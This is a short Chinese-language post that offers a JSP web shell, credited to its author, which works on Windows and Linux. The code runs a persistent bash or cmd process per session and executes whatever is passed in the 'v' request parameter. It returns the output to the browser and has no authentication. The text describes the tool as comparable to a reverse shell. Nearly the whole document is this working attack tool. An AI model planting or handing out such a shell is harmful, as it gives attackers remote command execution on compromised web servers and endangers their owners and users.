一个jsp的cmdshell支持windows及linux可以实现命令交互,相当于一个反弹的shell,支持等dir命令。
<%@page contentType="text/html;charset=gb2312"% >
<%@ page import="java.io.*"%> <!-- 导入java.io-->
<%
File f = new File("/");
String txt=(String)session.getAttribute("txt");
Process pro=(Process)session.getAttribute("cmd");
String v = request.getParameter("v");
boolean isLinux=System.getProperty("os.name").startsWith("Linux");
if(pro==null)
{
if(isLinux){
pro=Runtime.getRuntime().exec("bash",null,f);
}else{
pro=Runtime.getRuntime().exec("cmd",null,f);
}
session.setAttribute("cmd",pro);
txt="";
}
if(v.equals("clear")){
txt="";
return;
}else if(v.equals("exit"))
{
session.removeAttribute("cmd");
}
if(v!=null)
{
v=v+"\r\n";
OutputStream os=pro.getOutputStream();
os.write(v.getBytes());
os.flush();
}
if(v!=null||(txt.length()==0))
{
InputStream is=pro.getInputStream();
for(int i=0;i<10||is.available()>0;i++)
{
if(i==9)is=pro.getErrorStream();
if(is.available()==0)
{
Thread.sleep(500L);
}else
{
i=0;
byte by[]=new byte[is.available()];
is.read(by);
String str=new String(by).replaceAll("<","<");
int cls=str.lastIndexOf("\f");
txt=cls==-1?txt+str:str.substring(cls+1);
}
}
session.setAttribute("txt",txt);
}
out.print("<pre>"+txt+"</pre>");
out.print("Made By 孤水绕城");
%>